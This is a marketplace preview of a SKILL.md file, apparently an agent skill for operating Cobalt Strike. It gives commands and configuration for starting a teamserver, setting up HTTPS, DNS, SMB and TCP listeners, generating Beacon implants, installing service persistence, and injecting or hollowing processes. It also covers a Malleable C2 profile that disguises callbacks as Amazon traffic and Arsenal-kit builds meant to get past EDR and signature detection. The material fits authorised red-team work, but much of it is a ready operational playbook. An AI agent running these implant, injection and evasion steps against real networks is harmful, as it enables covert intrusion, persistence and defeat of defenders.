Skip to main content

c2-cobalt-strike

Cobalt Strike operations — Beacon deployment, Malleable C2 profile creation, listener setup, OPSEC-safe beacon configuration, process injection, and Arsenal kit usage.

Jump to install

Source facts

Repository
BitterSecurity/Decepticon
Last source activity
June 29, 2026 at 01:38
Detected SKILL.md language
English
Stars
5,565
Forks
1,053

Install options

The review-first prompt is selected by default. You can switch to a direct command or download a local copy.

Review the source files

Read SKILL.md and any companion files shown by SkillsMP before deciding whether to install.

Showing SKILL.md

SKILL.md
Source instructions · Read-only preview
name
c2-cobalt-strike
description
Cobalt Strike operations — Beacon deployment, Malleable C2 profile creation, listener setup, OPSEC-safe beacon configuration, process injection, and Arsenal kit usage.
allowed-tools
Bash Read Write
metadata
{"subdomain":"command-and-control","when_to_use":"Cobalt Strike, beacon, malleable c2, aggressor, teamserver, cobalt strike listener, arsenal kit","tags":"c2, cobalt-strike, beacon, malleable-c2, process-injection, listener, opsec","mitre_attack":"T1071.001, T1573.001, T1095, T1572"}
# Cobalt Strike Beacon Operations Cobalt Strike is a commercial adversary simulation platform. It provides Beacon implants with async and interactive modes, Malleable C2 profiles for traffic shaping, and extensible post-exploitation via Aggressor scripts and the Arsenal kit. ## Quick Reference ```bash # Start teamserver ./teamserver <TEAMSERVER_IP> <PASSWORD> /path/to/malleable.profile # Connect client ./cobaltstrike # Generate stageless HTTPS Beacon (CLI) ./pegen --os windows --arch x64 --listener https-beacon --format exe --output /workspace/exploit/beacon.exe # List active Beacons (Aggressor console) beacon_ids() ``` ## MITRE ATT&CK Mapping | Technique | ID | Usage in Skill | |-----------|----|----------------| | Application Layer Protocol: Web Protocols | T1071.001 | HTTPS/HTTP Beacon traffic | | Encrypted Channel: Symmetric Cryptography | T1573.001 | AES-256 encrypted C2 comms | | Non-Application Layer Protocol | T1095 | Raw TCP/SMB Beacon channels | | Protocol Tunneling | T1572 | DNS tunneling, SMB named pipe chaining | ## 1. Teamserver Setup The teamserver is the Cobalt Strike operator backend. All Beacons call back to it through configured listeners. ```bash # Start teamserver with a Malleable C2 profile cd /opt/cobaltstrike ./teamserver <TEAMSERVER_IP> <SHARED_PASSWORD> /workspace/profiles/amazon.profile # Start on a non-default port ./teamserver <TEAMSERVER_IP> <SHARED_PASSWORD> /workspace/profiles/amazon.profile 50050 # Verify teamserver is listening ss -tlnp | grep -E '(50050|443)' ``` **OPSEC notes:** - Never expose the teamserver port directly to the internet — use a redirector - Use a unique password per engagement; avoid defaults - Bind the management port to localhost or VPN interface only ## 2. Listener Configuration ### HTTPS Listener ``` # Cobalt Strike GUI: Cobalt Strike > Listeners > Add # Name: https-beacon # Payload: Beacon HTTPS # Host: <C2_DOMAIN> # Port: 443 # Beacons: <C2_DOMAIN> # Profile: (loaded at teamserver start) ``` ### DNS Listener ``` # Name: dns-beacon # Payload: Beacon DNS # Host: ns1.<C2_DOMAIN> # Beacons: <C2_DOMAIN> # Port: 53 # NS Response: <TEAMSERVER_IP> # # Required DNS records: # A ns1.<C2_DOMAIN> -> <TEAMSERVER_IP> # NS c2.<C2_DOMAIN> -> ns1.<C2_DOMAIN> ``` ### SMB Listener (Peer-to-Peer) ``` # Name: smb-beacon # Payload: Beacon SMB # Pipename: \\.\pipe\msagent_<RANDOM> # # SMB Beacons chain through an egress Beacon — no direct internet required. # Use for lateral movement inside segmented networks. ``` ### TCP Listener (Bind/Reverse) ``` # Name: tcp-bind # Payload: Beacon TCP (Bind) # Port: 4444 # # The parent Beacon connects to the child — useful when the child # cannot initiate outbound connections. ``` ## 3. Beacon Generation ### Stageless Payloads (Preferred for OPSEC) ```bash # GUI: Attacks > Packages > Windows Executable (S) # Listener: https-beacon # Output: Windows EXE (stageless) # x64: checked # Save to: /workspace/exploit/beacon_https_x64.exe # Raw shellcode for custom loaders # Attacks > Packages > Payload Generator # Listener: https-beacon # Output: Raw # x64: checked # Save to: /workspace/exploit/beacon.bin ``` ### Staged Payloads ```bash # GUI: Attacks > Packages > Windows Executable # Listener: https-beacon # Output: Windows EXE # x64: checked # Smaller initial payload — fetches full Beacon from listener on execution. # WARNING: staging traffic is signatured; prefer stageless in mature environments. ``` ### DLL Payloads (Sideloading) ```bash # Attacks > Packages > Windows DLL # Listener: https-beacon # x64: checked # Save to: /workspace/exploit/beacon.dll # Execute via sideloading or rundll32 # rundll32.exe beacon.dll,StartW ``` ### Service EXE (Persistence) ```bash # Attacks > Packages > Windows Service EXE # Listener: https-beacon # x64: checked # Registers as a Windows service for persistence via: # sc create <NAME> binPath= "C:\path\to\svc_beacon.exe" start= auto ``` ## 4. Malleable C2 Profiles Malleable C2 profiles shape Beacon traffic to mimic legitimate application behavior, evading network-level detection. ### Profile Structure ``` # /workspace/profiles/amazon.profile set sample_name "Amazon Browsing"; set sleeptime "60000"; # 60 second callback set jitter "37"; # 37% jitter set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"; # Process injection defaults set host_stage "false"; # Disable staging (OPSEC) https-certificate { set CN "www.amazon.com"; set O "Amazon.com Inc."; set C "US"; set validity "365"; } http-get { set uri "/s/ref=nb_sb_noss"; client { header "Accept" "text/html,application/xhtml+xml"; header "Accept-Encoding" "gzip, deflate, br"; header "Accept-Language" "en-US,en;q=0.9"; metadata { base64url; parameter "field-keywords"; } } server { header "Content-Type" "text/html; charset=UTF-8"; header "Server" "Server"; header "X-Amz-Cf-Id" "XXXXXXXXX"; output { netbios; prepend "<!DOCTYPE html><html>"; append "</html>"; print; } } } http-post { set uri "/gp/product/handle-buy-box"; client { header "Content-Type" "application/x-www-form-urlencoded"; id { base64url; parameter "session-id"; } output { base64url; parameter "data"; } } server { header "Content-Type" "application/json"; output { netbios; prepend "{\"status\":\"ok\",\"data\":\""; append "\"}"; print; } } } ``` ### Profile Validation ```bash # Lint profile before loading ./c2lint /workspace/profiles/amazon.profile # Expected output: no errors, warnings acceptable # If c2lint fails, the teamserver will refuse to load the profile ``` ### OPSEC-Critical Profile Settings ``` # Disable staged payloads (prevents signature on staging URI) set host_stage "false"; # Spawn-to — controls which process Beacon forks into for post-ex set spawnto_x86 "%windir%\\syswow64\\dllhost.exe"; set spawnto_x64 "%windir%\\sysnative\\dllhost.exe"; # Data transform — change encoding to avoid base64 signatures set data_jitter "100"; # TCP frame header (avoids default Beacon wire signature) set tcp_frame_header "\x80"; # SMB pipe name (avoid defaults) set pipename "mojo.5688.8052.183894939787088877##"; set pipename_stager "mojo.5688.8052.35780273329370473##"; ``` ## 5. Sleep and Jitter Configuration ``` # Interactive (risky — high beacon rate) sleep 0 # Low-and-slow recon phase sleep 300 50 # 5 min +-50% jitter = 150-450 sec intervals # Standard operations sleep 60 37 # 60 sec +-37% jitter # Long-haul persistence sleep 3600 80 # 1 hour +-80% jitter = 12 min to 1h48m ``` **Guidance:** | Phase | Sleep (sec) | Jitter (%) | Rationale | |-------|-------------|------------|-----------| | Initial access | 60–300 | 30–50 | Blend with normal browsing patterns | | Active operations | 10–30 | 20–40 | Responsiveness with some variation | | Persistence / dormant | 1800–86400 | 50–80 | Minimize traffic, maximize dwell | | Interactive tasking | 0 (session mode) | — | Only for time-critical ops, revert after | ## 6. Process Injection ### Fork & Run (Default) ``` # Beacon spawns a sacrificial process, injects code, collects output, kills process. # Controlled by spawnto_x86/x64 in profile. # Override per-command: spawnto x64 %windir%\sysnative\RuntimeBroker.exe ``` ### Inline Execution (BOF) ``` # BOFs execute in Beacon's own process — no new process, no fork. # Use Arsenal/community BOFs for OPSEC-sensitive tasks. inline-execute /workspace/bofs/whoami.o ``` ### Manual Injection ``` # Inject Beacon shellcode into a running process inject <PID> x64 https-beacon # Shinject — inject arbitrary shellcode shinject <PID> x64 /workspace/exploit/shellcode.bin # DLL injection dllinject <PID> /workspace/exploit/beacon.dll ``` ### Process Hollowing ``` # Spawn a suspended process and replace its image # Attacks > Packages > Payload Generator > choose process hollowing # Target process: svchost.exe, RuntimeBroker.exe, or similar long-lived system process ``` **OPSEC process selection:** | Process | Risk | Notes | |---------|------|-------| | `svchost.exe` | Low (if spawned correctly) | Must run as SYSTEM with correct parent | | `RuntimeBroker.exe` | Low | Normal user-level process | | `dllhost.exe` | Low | COM surrogate, common | | `notepad.exe` | Medium | Users notice open windows | | `powershell.exe` | High | Heavily monitored by EDR | ## 7. Arsenal Kit Integration The Arsenal kit provides source-level customization of Cobalt Strike's built-in capabilities. ```bash # Build custom artifacts (shellcode loaders, DLLs) cd /opt/cobaltstrike/arsenal-kit/kits/artifact ./build.sh pipe VirtualAlloc 310272 5 false false /workspace/arsenal/artifact # Build custom resource kit (PowerShell templates, HTA, VBA) cd /opt/cobaltstrike/arsenal-kit/kits/resource ./build.sh /workspace/arsenal/resource # Build custom process-inject kit cd /opt/cobaltstrike/arsenal-kit/kits/process_inject ./build.sh /workspace/arsenal/process_inject # Load customized kits via Aggressor # In Script Console: load("/workspace/arsenal/artifact/artifact.cna") load("/workspace/arsenal/resource/resources.cna") load("/workspace/arsenal/process_inject/process_inject.cna") ``` ## 8. OPSEC Considerations | Risk | Default Behavior | Mitigation | |------|-------------------|------------| | Named pipes | `\\.\pipe\msagent_XX` | Custom `pipename` in profile | | Spawn-to process | `rundll32.exe` | Set `spawnto_x64` to `dllhost.exe` or `RuntimeBroker.exe` | | Staging URIs | Checksum8 pattern (`/aaa9`, `/ab2g`) | `set host_stage "false"` | | Self-signed TLS | Default CS cert | Use valid cert or Malleable `https-certificate` block | | JA3 fingerprint | Unique to CS | Use a redirector with nginx to terminate TLS | | User-Agent | Default CS UA | Set in Malleable profile | | Post-ex commands | Fork & run (new process) | Use BOFs for inline execution | | DNS queries | High volume TXT records | Increase sleep, use hybrid DNS+HTTPS | ## Detection Signatures | Indicator | Pattern | Mitigation | |-----------|---------|------------| | Default named pipe | `\\.\pipe\msagent_*` | Custom pipename in Malleable profile | | Checksum8 staging URI | URI where `checksum8(uri) == 92` (x86) or `93` (x64) | Disable staging (`host_stage "false"`) | | Beacon metadata | XOR-encoded cookie in HTTP GET | Custom metadata transform in profile | | Default TLS cert | Serial `146473198` / Issuer "Major Cobalt Strike" | Valid cert or custom `https-certificate` | | Sleep pattern | Consistent interval with fixed jitter | Randomize sleep values per phase | | NtCreateThreadEx injection | ETW process injection telemetry | Use BOFs, modify process_inject kit | | Named pipe impersonation | `ImpersonateNamedPipeClient` calls | Unique pipe names, limit lateral SMB usage | ## Error Handling & Edge Cases | Issue | Symptom | Resolution | |-------|---------|------------| | c2lint fails | `Profile failed validation` | Fix syntax; ensure all blocks have matching braces | | Beacon won't call back | No sessions appear | Verify listener port open, DNS resolves, redirector forwards correctly | | Staging blocked | `HTTP 404` on stager URI | Defender blocking checksum8 URI; switch to stageless | | Process injection fails | `Could not inject` | Target process arch mismatch (x86 vs x64) or protected process | | Malleable profile conflict | Teamserver exits on start | Only one profile per teamserver; check for duplicate global options | | Beacon killed after minutes | AV/EDR detection | Recompile artifact kit, change sleep, use process hollowing | | SMB Beacon unreachable | `could not connect to pipe` | Firewall blocking port 445 or pipe name changed | ## Decision Gate ``` Is the target environment monitored by mature EDR? ├── YES │ ├── Use stageless payloads with host_stage=false │ ├── Customize artifact kit for loader evasion │ ├── BOFs over fork-and-run for post-exploitation │ ├── Profile mimicking high-volume site (CDN, SaaS) │ └── Consider domain fronting (see c2-domain-fronting skill) ├── NO (limited monitoring) │ ├── Standard HTTPS listener with moderate profile │ ├── Fork-and-run acceptable for speed │ └── Default artifact kit may suffice └── INTERNAL PIVOT (post-initial-access) ├── SMB Beacon for peer-to-peer chaining ├── TCP bind Beacon for segmented networks └── Named pipe customization required ``` ## Tools & Resources | Tool | Purpose | Source |
View on GitHub
This SKILL.md is very large, so SkillsMP previews the first section here. View on GitHub